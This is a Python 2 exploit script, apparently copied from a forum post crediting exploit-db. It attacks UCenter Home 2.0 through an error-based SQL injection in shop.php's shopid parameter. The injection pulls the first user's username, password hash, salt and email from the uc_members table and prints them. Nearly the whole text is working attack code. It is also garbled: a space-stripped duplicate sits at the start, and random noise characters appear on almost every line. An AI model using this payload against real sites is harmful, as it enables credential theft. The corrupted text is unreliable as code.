#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
3 [- Z9 D# ?# q7 }4 P& ]
# ]) f* f* a/ n, }' }0 F
5 A8 `- E8 M4 W8 q#!/usr/bin/env python
0 Z8 X2 e% J1 a/ S' V) a: L, c " N5 r1 R/ }5 o& h
import sys " V0 @( f. x) D9 s' @1 J1 F6 J
import urllib2
u8 F' A. A0 d* Y, I% i, B8 {import re 3 v% C! o4 q& K2 ? Q8 Z8 I7 [+ B6 k6 u
6 {# N* u$ n9 j1 L
def info():
% {0 X* q) _ w, ]! ^; z3 q print 'From:http://www.exploit-db.com/exploits/14997/' 1 q$ e: o2 \& }
print 'http://www.hake.cc/Web_loudong/' ' }- k' r' N* V) K6 g
print 'changed:qiaoy'
/ m+ W% [, q" R! y0 h6 |! q7 H print 'exp:' * {6 ^6 p+ {. w! i, s
print ' ./UCenter_Home_2.0.py site' ( u7 B! \9 G; I& E- A( a4 s- s
3 k0 ]0 C0 N- R1 I8 O9 d8 mdef main():
; n2 G. ]- i$ P; c9 {' T if len(sys.argv) != 2:
4 F' T, Z+ q3 t @# C1 N info()
, `# e0 H4 ], Q- \ else:
6 u% U( [: c, j0 A) W site = sys.argv[1]
/ [& e' M! ~. K1 c if site[0:7] == 'http://':
1 Y( l$ W# P- x& P# G sitesite =site
|1 N$ {5 J z( k4 N% Q elif site[0:8] == 'https://': - t/ L6 E" p( w6 V
sitesite = site , O" o6 ?+ z7 L, o# s, _7 l
else:
5 D w H g' f9 X* B# t site = 'http://'+site 5 r- _- P" Q& o6 c( l9 x, k1 s# g. L
try:
- h* s6 u7 q6 i% W: S url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
0 Q# `" s8 q$ [2 ` S Value = urllib2.urlopen(url).read() . K# Y9 l5 \5 R$ s# ^& J/ r: f9 k
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] & X5 M. j6 Q7 y# j! ~8 c, S
hacked = Msg.split(':')
6 c- j7 s! ]& W( ]- J+ F print 'Name: '+hacked[1] & k" d. f& q4 c3 [% c: x
print 'Passwd: '+hacked[2] 8 w" J, g& X9 A3 w$ v' j3 O- h$ a
print 'salt: '+hacked[3]
1 `6 V7 a- T' l6 F; \ print 'email: '+hacked[4] 2 f" s3 w. s$ i# v v0 k3 [9 K* x
except:
; @. V+ W+ X8 G print 'Sorry,I can\'t work............' 4 |3 i. Z1 i/ {$ A7 c. s3 z
4 H7 h& A4 ]7 o- M
if __name__ == '__main__':
: l' Q! w! f4 x main() |